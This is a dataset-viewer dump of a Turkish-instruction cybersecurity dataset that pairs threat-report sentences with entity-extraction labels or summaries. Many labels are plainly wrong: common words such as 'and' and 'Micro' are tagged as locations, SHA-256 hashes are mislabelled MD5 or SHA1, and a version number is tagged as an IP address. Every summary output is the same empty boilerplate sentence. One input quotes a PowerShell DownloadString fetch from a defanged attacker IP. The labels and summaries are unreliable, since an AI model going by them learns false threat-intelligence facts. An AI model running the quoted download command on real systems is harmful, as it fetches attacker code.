instruction
stringclasses 2
values | input
stringlengths 3
5.01k
| output
stringlengths 10
5.79k
|
|---|---|---|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Updated May 17, 2021, 3:25 a.m. Eastern Time:
|
TIME: 3:25 a.m. Eastern Time
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
.Win32.TRX.XXPE50FFF039 c8b6291fc7b6339d545cbfa99256e26de26fff5f928fef5157999d121fe46135
|
SHA2: c8b6291fc7b6339d545cbfa99256e26de26fff5f928fef5157999d121fe46135
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 11.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 1. _g_hIsolatedHeap handle used for isolated heap
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This post is also available in: 日本語 (Japanese) Ransomware is one of the top threats in cybersecurity and a focus area for Palo Alto Networks.
|
identity: Palo Alto Networks
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.
|
malware: Cyclops Blink; SOFTWARE: WatchGuard Firebox; SOFTWARE: Asus devices
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Notably, we also studied the Robot Operating System 2 (ROS 2) because it uses DDS as its default standard operating system (OS) middleware for all robotics and automation use cases.
|
SOFTWARE: Robot Operating System 2 (ROS 2)
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
After enabling the macros and the payload executes, two files – an obfuscated Visual Basic script (Detected by Trend Micro as VBS_VALYRIA.DOCT), and an obfuscated PowerShell script (Detected by Trend Mico as TROJ_VALYRIA.PS) — are created in the ProgramData directory placed in randomly-named directories.
|
location: and; location: Micro; location: and; attack-pattern: PowerShell; location: Mico; location: are
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Google is investing heavily as a company and as an industry to counter serious threats to our users.
|
identity: Google
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Indicators of Compromise SHA-256 hash Detection Name 08677a3dac3609d13dc4a2a6868ee2f6c1334f4579356d162b706a03839bb9ff Ransom.PS1.COLDLOCK.YPAE-A c5108344e8a6da617af1c4a7fd8924a64130b4c86fa0f6d6225bb75534a80a35 Ransom.MSIL.COLDLOCK.YPAE-A All Trend Micro products using the latest VSAPI pattern (15.849.00 or later) are capable of successful detection of this malware.
|
SHA2: 08677a3dac3609d13dc4a2a6868ee2f6c1334f4579356d162b706a03839bb9ff; location: Ransom; SHA2: c5108344e8a6da617af1c4a7fd8924a64130b4c86fa0f6d6225bb75534a80a35; location: Ransom; location: Micro; location: are
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
A new remote controller tool
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can't be loaded to memory.
|
SOFTWARE: Windows operating system (10 and 11); identity: Microsoft; SOFTWARE: Avast driver
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Most of these are created by malware authors who set up command and control (C2) servers with third party hosting providers and frequently update their locations to avoid detection.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In this technique, the RAT will be disguised as the normal wlbsctrl.dll.
|
FILEPATH: wlbsctrl.dll
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We found that most of the recipients hold high corporate positions, particularly in the finance department.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In the past, we’ve posted on issues like phishing campaigns, vulnerabilities and disinformation.
|
attack-pattern: phishing; location: and
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Stay tuned for more information about this topic in upcoming blogs.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Specifically, there are three things that combine to make ransomware a particularly potent threat on the technical level:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 6.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 1. Water Nue attack scenario Figure 2. Sample of recorded credentials
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Please mark, I'm not a robot!
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.
|
campaign: Sandworm campaign; SOFTWARE: Microsoft Office; location: Ukraine
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The DTLS protocol is used by Microsoft Windows Remote Desktop Gateway (RDG) to establish a secure channel between the RDG client and RDG server (described in detail in [MS_TSGU].pdf). The RDG client initiates the DTLS connection by sending a ClientHello to the RDG Server. The RDG server then responds with a DTLS Hello Verify Request that contains a cookie; this is used as a denial of service countermeasure.
|
SOFTWARE: Microsoft Windows Remote Desktop Gateway (RDG); FILEPATH: [MS_TSGU].pdf
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
If a command targets the core component, it can be one of the following: Command ID Action 0 Terminates the program 1 Bypasses the data-sending interval and sends data to C&C servers immediately 2 Adds a new C&C server to the list in memory 3 Sets time to send the next packet to the C&C server 4 Sets time to send the next packet to the C&C server 5 Adds a new module (an ELF file should be received following the command)
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
However, by comparing key pieces of information with known sources, it is possible to determine when a campaign was likely perpetrated by a certain group.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Possibly sends collected data to attackers via C&C channel Indicators of Compromise (IoCs) SHA256 Detection Name 649675baef92381ffcdfa42e8959015e83c1ab1c7bbfd64635ce5f6f65efd651 BKDR_WATERBEAR.ZTGF 3909e837f3a96736947e387a84bb57e57974db9b77fb1d8fa5d808a89f9a401b TROJ_WATERBEAR.ZTGD fcfdd079b5861c0192e559c80e8f393b16ba419186066a21aab0294327ea9e58 TROJ_WATERBEAR.ZTGJ 3f26a971e393d7f6ce7bf4416abdbfa1def843a0cf74d8b7bb841ca90f5c9ed9 TROJ_WATERBEAR.ZTGH abb91dfd95d11a232375d6b5cdf94b0f7afb9683fb7af3e50bcecdb2bd6cb035 TROJ_WATERBEAR.ZTGH bda6812c3bbba3c885584d234be353b0a2d1b1cbd29161deab0ef8814ac1e8e1 TROJ_WATERBEAR.ZTGI 53402b662679f0bfd08de3abb064930af40ff6c9ec95469ce8489f65796e36c3 TROJ_WATERBEAR.ZTGH f9f6bc637f59ef843bc939cb6be5000da5b9277b972904bf84586ea0a17a6000 TROJ_WATERBEAR.ZTGI 3442c076c8824d5da065616063a6520ee1d9385d327779b5465292ac978dec26 BKDR_WATERBEAR.ZTGD 7858171120792e5c98cfa75ccde7cba49e62a2aeb32ed62322aae0a80a50f1ea
|
SHA2: 649675baef92381ffcdfa42e8959015e83c1ab1c7bbfd64635ce5f6f65efd651; SHA2: 3909e837f3a96736947e387a84bb57e57974db9b77fb1d8fa5d808a89f9a401b; SHA1: fcfdd079b5861c0192e559c80e8f393b16ba419186066a21aab0294327ea9e58; SHA1: 3f26a971e393d7f6ce7bf4416abdbfa1def843a0cf74d8b7bb841ca90f5c9ed9; SHA2: abb91dfd95d11a232375d6b5cdf94b0f7afb9683fb7af3e50bcecdb2bd6cb035; SHA1: bda6812c3bbba3c885584d234be353b0a2d1b1cbd29161deab0ef8814ac1e8e1; SHA2: 53402b662679f0bfd08de3abb064930af40ff6c9ec95469ce8489f65796e36c3; SHA2: f9f6bc637f59ef843bc939cb6be5000da5b9277b972904bf84586ea0a17a6000; MD5: 3442c076c8824d5da065616063a6520ee1d9385d327779b5465292ac978dec26; SHA1: 7858171120792e5c98cfa75ccde7cba49e62a2aeb32ed62322aae0a80a50f1ea
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Figure 7: The components dropped in the %Application Data%\Microsoft\CLR\* directory PRB-Backdoor is a backdoor that takes its name from the function used in the final PowerShell script payload, as seen in the figure below. Figure 8.
|
attack-pattern: PowerShell
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We’ve disrupted attacks using Google Drive, App Scripts, and Sites pages in these campaigns as APT35 tries to get around our defenses.
|
threat-actor: APT35; SOFTWARE: Google Drive
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
While the endpoint is still critical, there are vast numbers of malicious artifacts that are siloed or missed at the network, cloud, and gateway.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Both use different samples for the multiple malware downloaded.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We terminated 34 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Myanmar.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Organizations should also create a program that can manage and control their supply chain's vulnerabilities, minimizing the possibilities of attacks.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
NOTE: On May 20th, we updated our attribution to more precisely describe our findings.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
One example here is Makop, contained in a 7z archive along with an infostealer malware (SHA256: DE6DFA018773E07C218EF1DF62CE0D99A708841BF1DDFB4C6AD7E323D5D666A4).
|
malware: infostealer; SHA2: DE6DFA018773E07C218EF1DF62CE0D99A708841BF1DDFB4C6AD7E323D5D666A4; tools: 7z
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
After these functions are loaded, the malware will randomly select an executable from the system32 using the same routine witnessed in the earlier sample.
|
FILEPATH: system32
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Architecture of the backdoor
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
When launched, the tool makes an HTTP GET request to a C2 to check for a response body of "OK'' and will terminate if it's not found.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We do neither, but we plan to work with the consortium to enhance security-by-design in ROS-I software.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Additionally, the file marker changed again, this time to what seems to be random bytes rather than a coherent string.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
An in-depth technical analysis of AnubisSpy, along with indicators of compromise, is in this technical brief.
|
malware: AnubisSpy
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
With the Capstone.js configured for X86-64 and not ARM, we can also derive the target hardware is Intel-based Macs.
|
SOFTWARE: Capstone.js
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It won’t be a surprise given mobile platform’s increasing ubiquity, especially in workplaces.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Dump password from SQL database printdat.dll RAT (PlugX variant)
|
malware: PlugX
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc
|
SHA2: fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Google’s Threat Analysis Group (TAG) is a specialized team of security experts that works to identify, report, and stop government-backed phishing and hacking against Google and the people who use our products.
|
location: security; location: and; location: stop; attack-pattern: phishing; location: and; location: and
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This operation affected countries around the globe, but it appears that southeast Asia, northern Africa, and countries in South America were hit the most as shown below. Malicious downloads by country The specific breakout of countries affected, and their download counts are as follows: Taking all those points together, this is operation is very large and clearly very effective.
|
attack-pattern: Malicious downloads; location: southeast Asia; location: northern Africa; location: South America
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.
|
threat-actor: COLDRIVER; attack-pattern: phishing; tools: Ghostwriter; location: war; location: and; attack-pattern: phishing
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
As anti-fraud protections evolved, so did the criminals.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Backdoor commands found in CapraRAT This APK file also has the ability to drop mp4 or APK files from asset directory.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
For information on how Palo Alto Networks products are affected by these issues, customers can see our posting on the Live Community at: https://live.paloaltonetworks.com/t5/Customer-Advisories/Information-about-Meltdown-and-Spectre-findings/ta-p/193878/jump-to/first-unread-message.
|
identity: Palo Alto Networks; URL: https://live.paloaltonetworks.com/t5/Customer-Advisories/Information-about-Meltdown-and-Spectre-findings/ta-p/193878/jump-to/first-unread-message
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Figure 9 shows the example of executing Netcat to establish a reverse shell to a remote server on the compromised server.
|
tools: Netcat; attack-pattern: establish a reverse shell
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It’s easy to see why the services of a cybermercenary like Void Balaur is in demand — these types of information can be very useful for a group or an individual who wants to launch an attack on specific targets.
|
threat-actor: Void Balaur
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The service is started when the device connectivity is changed.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
System.Net.WebClient).DownloadString('hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1
|
malware: Net; MD5: deb2b1a127c472229babbb8dc2dca1c2
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
1.a JS file Trojan
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This is somewhat surprising, considering Operation Earth Kitsune’s espionage tools were entirely fresh-developed.
|
campaign: Operation Earth Kitsune’s
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
One key thing that research into these security incidents shows is that these attacks used a relatively new and unknown technique called kernel APC attacks as part of their toolkit.
|
attack-pattern: kernel APC attacks
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We received leads from Graphika that supported us in this investigation.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It appears that their technical capabilities are limited despite being able to successfully target high-level employees globally.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Attackers can gain access to your personal and financial information.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Hooking T1179 Hooks security product’s commonly used APIs Privilege Escalation Process Injection T1055 Injects the decrypts payload into svchost.exe process Hooking T1179 Hooks security products’ commonly used APIs Defense Evasion Binary Padding T1009 Adds junk data to evade anti-virus scan Disabling Security Tools T1089 Targets a specific security product’s process for injection purposes Deobfuscate/Decode Files or Information T1140 Uses TROJ_WATERBEAR to decrypt encrypted payload Execution Guardrails T1480 Targets specific software in the victim’s environment DLL
|
attack-pattern: Hooking; location: Hooks; location: security; attack-pattern: Privilege Escalation; attack-pattern: Process Injection; attack-pattern: Hooking; location: Hooks; location: security; attack-pattern: Binary Padding; attack-pattern: Disabling Security Tools; location: security
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.
|
TIME: November 2019; malware: Capesand; SOFTWARE: Adobe Flash; SOFTWARE: Microsoft Internet Explorer
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We know this time and time again—yes a bunch of nation-state stuff does happen but the vast majority of you are unaffected by it same with there's a massive amount of script-kiddie just sort of scanning random people with random tools that are just seeing what they can get away with that and if you have solid, automated defenses that doesn't really impact you.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We also believe the presence of specific, valid named hosts from the network used in Stage 2 shows they were obtained directly from Active Directory on a domain controller.
|
SOFTWARE: Active Directory
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Four of the five Sysget variants included a form of decoy document to trick users into believing they had opened a legitimate file rather than malware.
|
malware: Sysget; attack-pattern: decoy document
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 6.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Where possible, reduce your attack surface.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Figure 1. Exploit loading sequence in ria[.]ru (February 2012) Figure 2. [bg].ru (February 2012) found redirecting victims to Lurk’s exploit kit Figure 3. Redirects to the Lurk landing page from adfox[.]ru banner network Figure 4. Malicious iframe content served by tks[.]ru (August 2013)
|
threat-actor: Lurk; malware: Lurk; location: landing; location: page; location: banner; location: content
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Avast responded to our notification with this statement: "We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.
|
FILEPATH: aswArPot.sys; SOFTWARE: Avast 21.5; TIME: June 2021; identity: Avast
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.
|
identity: TAG
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It seems that this hard-coded key and flawed RC4 implementation were also used in a malware family named TigerPlug, probably because it spreads the PlugX malware.
|
location: hard; location: and; malware: PlugX
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
To send data to the C&C server, the core component performs a TLS handshake with a randomly chosen C&C server at a random TCP port, both of which are from a hard-coded list.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B
|
malware: Trojan.W97M.CONFUCIUS.B; SOFTWARE: Trend Micro™ Deep Discovery™; SHA2: dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2; malware: Trojan.W97M.CONFUCIUS.A; SHA2: 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
For instance, we have successfully tested this exploit on Samsung Galaxy S4 Android phones running Android 4.3 (Build version JSS15J.I337UCUEMK2, Built on Nov. 16, 2013), and Amazon Fire OS version 13.3.2.5.
|
location: and; IPV4: 13.3.2.5
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
A recent report uncovered this threat group’s attack infrastructure, which leveraged commercial VPN providers in addition to compromised systems to use as proxies to further mask their origins.
|
threat-actor: mask
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We routinely observe vulnerable devices across the global internet, despite the fact that most of these CVEs are more than two years old.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
When we analyzed ANEL 5.1.1 rc, encrypted ANEL 5.1.2 rc1 was downloaded and executed.
|
malware: ANEL 5.1.1 rc; malware: ANEL 5.1.2 rc1
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Due to the suspicious nature of this activity, we decided to investigate further.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We further investigated the following cases:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Whether it’s a big-name e-commerce brand like Newegg, a national airline, a global ticketing site (Ticketmaster), or even online campus stores serving nearly 200 universities in the US and Canada–as long as they accept online payments, they’re at risk.
|
identity: Ticketmaster; location: US; location: Canada; identity: Newegg
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This vulnerability is being referred to as MS14-066.
|
vulnerability: MS14-066
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.
|
tools: safety; location: and; location: security; location: and; location: community
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
macOS Exploits
|
SOFTWARE: macOS
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
As described in Google’s official document, the app developer is required to create a keystore with a set of private keys, and then use the private key to generate a signed version of apps.
|
identity: Google
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The most common types of attack include denial of service (DoS), path traversal, server-side request forgery (SSRF), and remote code execution (RCE).
|
location: most; attack-pattern: path traversal; location: and; location: remote
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Only when attackers have the right to read/write any address can they utilize either Flash or ActiveX methods to get code execution.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The script parsed the Mach-O at each section where the strings were located, then decoded the strings with their respective XOR keys, and patched the binary with the resulting strings.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Trend Micro's Zero-Day Initiative (ZDI) provided technical analysis of recently patched vulnerabilities in the SolarWinds Orion Platform.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
TROJ64_WATERBEAR.ZTGI acb2abc7fb44c2fdea0b65706d1e8b4c0bfb20e4bd4dcee5b95b346a60c6bd31 BKDR_WATERBEARENC.ZTGF b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 BKDR64_WATERBEAR.ZTGD 7c0d2782a33debb65b488893705e71a001ea06c4eb4fe88571639ed71ac85cdd BKDR_WATERBEARENC.ZTGH c7c7b2270767aaa2d66018894a7425ba6192730b4fe2130d290cd46af5cc0b7b BKDR_WATERBEARENC.ZTGI 7532fe7a16ba1db4d5e8d47de04b292d94882920cb672e89a48d07e77ddd0138 BKDR_WATERBEARENC.ZTGI dea5c564c9d961ccf2ed535139fbfca4f1727373504f2972ac92acfaf21da831 BKDR_WATERBEARENC.ZTGI 05d0ab2fbeb7e0ba7547afb013d307d32588704daac9c12002a690e5c1cde3a4 BKDR64_WATERBEARENC.ZTGJ 39668008deb49a9b9a033fd01e0ea7c5243ad958afd82f79c1665fb73c7cfadf BKDR_WATERBEARENC.ZTGD Tags Malware | APT & Targeted Attacks | Endpoints | Research | Network
|
SHA2: acb2abc7fb44c2fdea0b65706d1e8b4c0bfb20e4bd4dcee5b95b346a60c6bd31; SHA1: b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361; MD5: 7c0d2782a33debb65b488893705e71a001ea06c4eb4fe88571639ed71ac85cdd; SHA2: c7c7b2270767aaa2d66018894a7425ba6192730b4fe2130d290cd46af5cc0b7b; SHA2: 7532fe7a16ba1db4d5e8d47de04b292d94882920cb672e89a48d07e77ddd0138; SHA1: dea5c564c9d961ccf2ed535139fbfca4f1727373504f2972ac92acfaf21da831; SHA1: 05d0ab2fbeb7e0ba7547afb013d307d32588704daac9c12002a690e5c1cde3a4; SHA2: 39668008deb49a9b9a033fd01e0ea7c5243ad958afd82f79c1665fb73c7cfadf; location: APT
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Either way, somebody needs their computer privileges revoked.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm.
|
malware: Tor
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We already notified the websites about the compromise.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The abuse of compromised email accounts in the Middle East continued in 2020.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 12.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In this environment blocking and taking down DGA-related domains quickly becomes a game of “whack a mole” that is sometimes futile.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.